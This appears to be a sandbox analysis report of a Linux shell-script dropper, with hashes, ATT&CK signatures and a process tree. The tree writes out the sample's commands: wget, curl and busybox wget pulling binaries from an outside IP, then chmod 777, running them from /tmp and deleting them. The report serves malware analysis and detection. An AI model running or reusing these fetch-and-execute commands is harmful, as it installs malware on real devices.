Analysis
max time kernel: 20s
max time network: 57s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 25/10/2024, 01:27
Static task: static1
Behavioral task: behavioral1
  Sample: 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
  Resource: ubuntu1804-amd64-20240729-en
Behavioral task: behavioral2
  Sample: 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
  Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
  Sample: 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
  Resource: debian9-mipsbe-20240729-en
Behavioral task: behavioral4
  Sample: 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
  Resource: debian9-mipsel-20240729-en
General
Target: 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Size: 10KB
MD5: 1842c293913809baf3b70d2c7616a370
SHA1: cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
SHA256: 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
SHA512: 92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
SSDEEP: 96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 17 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
795  chmod
826  chmod
854  chmod
763  chmod
836  chmod
848  chmod
860  chmod
782  chmod
742  chmod
776  chmod
811  chmod
866  chmod
727  chmod
699  chmod
709  chmod
842  chmod
688  chmod
Executes dropped EXE 17 IoCs
ioc  pid  Process
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO  689  DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy  700  jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt  710  Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  728  aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2  744  Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn  764  KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK  777  5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq  783  Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2  797  BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI  812  3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw  827  F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4  837  RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  843  HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  849  hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  855  hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  861  HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  867  aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
Checks CPU configuration 1 TTPs 17 IoCs
Checks CPU information, which indicates whether the system is a virtual machine.
description  ioc  Process
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
File opened for reading  /proc/cpuinfo  curl
Reads runtime system information 34 IoCs
description  ioc  Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/self/auxv  curl
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid  Process
846  curl
847  busybox
849  hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
852  curl
856  rm
845  wget
850  rm
851  wget
853  busybox
855  hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description  ioc  Process
File opened for modification  /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  curl
File opened for modification  /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO  curl
File opened for modification  /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2  curl
File opened for modification  /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4  curl
File opened for modification  /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  curl
File opened for modification  /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  curl
File opened for modification  /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  curl
File opened for modification  /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  curl
File opened for modification  /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy  curl
File opened for modification  /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI  curl
File opened for modification  /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn  curl
File opened for modification  /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq  curl
File opened for modification  /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt  curl
File opened for modification  /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  curl
File opened for modification  /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw  curl
File opened for modification  /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2  curl
File opened for modification  /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK  curl
Processes
Process tree (indentation shows depth; columns: PID, image, command line, matched signatures in brackets)
PID 662  /tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh  /tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
  PID 664  /bin/rm  rm bins.sh
  PID 666  /usr/bin/wget  wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
  PID 676  /usr/bin/curl  curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 685  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
  PID 688  /bin/chmod  chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO  [File and Directory Permissions Modification]
  PID 689  /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO  ./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO  [Executes dropped EXE]
  PID 690  /bin/rm  rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO
  PID 692  /usr/bin/wget  wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
  PID 696  /usr/bin/curl  curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 698  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
  PID 699  /bin/chmod  chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy  [File and Directory Permissions Modification]
  PID 700  /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy  ./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy  [Executes dropped EXE]
  PID 701  /bin/rm  rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy
  PID 702  /usr/bin/wget  wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
  PID 703  /usr/bin/curl  curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 704  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
  PID 709  /bin/chmod  chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt  [File and Directory Permissions Modification]
  PID 710  /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt  ./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt  [Executes dropped EXE]
  PID 712  /bin/rm  rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt
  PID 713  /usr/bin/wget  wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
  PID 717  /usr/bin/curl  curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 724  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
  PID 727  /bin/chmod  chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  [File and Directory Permissions Modification]
  PID 728  /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  ./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  [Executes dropped EXE]
  PID 730  /bin/rm  rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
  PID 732  /usr/bin/wget  wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
  PID 735  /usr/bin/curl  curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 740  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
  PID 742  /bin/chmod  chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2  [File and Directory Permissions Modification]
  PID 744  /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2  ./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2  [Executes dropped EXE]
  PID 745  /bin/rm  rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
  PID 746  /usr/bin/wget  wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
  PID 749  /usr/bin/curl  curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 758  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
  PID 763  /bin/chmod  chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn  [File and Directory Permissions Modification]
  PID 764  /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn  ./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn  [Executes dropped EXE]
  PID 765  /bin/rm  rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn
  PID 766  /usr/bin/wget  wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
  PID 770  /usr/bin/curl  curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 774  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
  PID 776  /bin/chmod  chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK  [File and Directory Permissions Modification]
  PID 777  /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK  ./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK  [Executes dropped EXE]
  PID 778  /bin/rm  rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK
  PID 779  /usr/bin/wget  wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
  PID 780  /usr/bin/curl  curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 781  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
  PID 782  /bin/chmod  chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq  [File and Directory Permissions Modification]
  PID 783  /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq  ./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq  [Executes dropped EXE]
  PID 784  /bin/rm  rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq
  PID 785  /usr/bin/wget  wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
  PID 788  /usr/bin/curl  curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 793  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
  PID 795  /bin/chmod  chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2  [File and Directory Permissions Modification]
  PID 797  /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2  ./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2  [Executes dropped EXE]
  PID 798  /bin/rm  rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2
  PID 799  /usr/bin/wget  wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
  PID 803  /usr/bin/curl  curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 808  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
  PID 811  /bin/chmod  chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI  [File and Directory Permissions Modification]
  PID 812  /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI  ./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI  [Executes dropped EXE]
  PID 813  /bin/rm  rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI
  PID 815  /usr/bin/wget  wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
  PID 818  /usr/bin/curl  curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 823  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
  PID 826  /bin/chmod  chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw  [File and Directory Permissions Modification]
  PID 827  /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw  ./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw  [Executes dropped EXE]
  PID 828  /bin/rm  rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw
  PID 830  /usr/bin/wget  wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
  PID 834  /usr/bin/curl  curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 835  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
  PID 836  /bin/chmod  chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4  [File and Directory Permissions Modification]
  PID 837  /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4  ./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4  [Executes dropped EXE]
  PID 838  /bin/rm  rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4
  PID 839  /usr/bin/wget  wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
  PID 840  /usr/bin/curl  curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 841  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
  PID 842  /bin/chmod  chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  [File and Directory Permissions Modification]
  PID 843  /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  ./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  [Executes dropped EXE]
  PID 844  /bin/rm  rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
  PID 845  /usr/bin/wget  wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [System Network Configuration Discovery]
  PID 846  /usr/bin/curl  curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 847  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [System Network Configuration Discovery]
  PID 848  /bin/chmod  chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [File and Directory Permissions Modification]
  PID 849  /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  ./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [Executes dropped EXE; System Network Configuration Discovery]
  PID 850  /bin/rm  rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [System Network Configuration Discovery]
  PID 851  /usr/bin/wget  wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [System Network Configuration Discovery]
  PID 852  /usr/bin/curl  curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory]
  PID 853  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [System Network Configuration Discovery]
  PID 854  /bin/chmod  chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [File and Directory Permissions Modification]
  PID 855  /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  ./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [Executes dropped EXE; System Network Configuration Discovery]
  PID 856  /bin/rm  rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz  [System Network Configuration Discovery]
  PID 857  /usr/bin/wget  wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
  PID 858  /usr/bin/curl  curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 859  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
  PID 860  /bin/chmod  chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  [File and Directory Permissions Modification]
  PID 861  /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  ./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj  [Executes dropped EXE]
  PID 862  /bin/rm  rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj
  PID 863  /usr/bin/wget  wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
  PID 864  /usr/bin/curl  curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 865  /bin/busybox  /bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
  PID 866  /bin/chmod  chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  [File and Directory Permissions Modification]
  PID 867  /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  ./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM  [Executes dropped EXE]
  PID 868  /bin/rm  rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM
  PID 869  /usr/bin/wget  wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
  File and Directory Permissions Modification (1)
    Linux and Mac File and Directory Permissions Modification (1)
  Virtualization/Sandbox Evasion (1)
    System Checks (1)
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97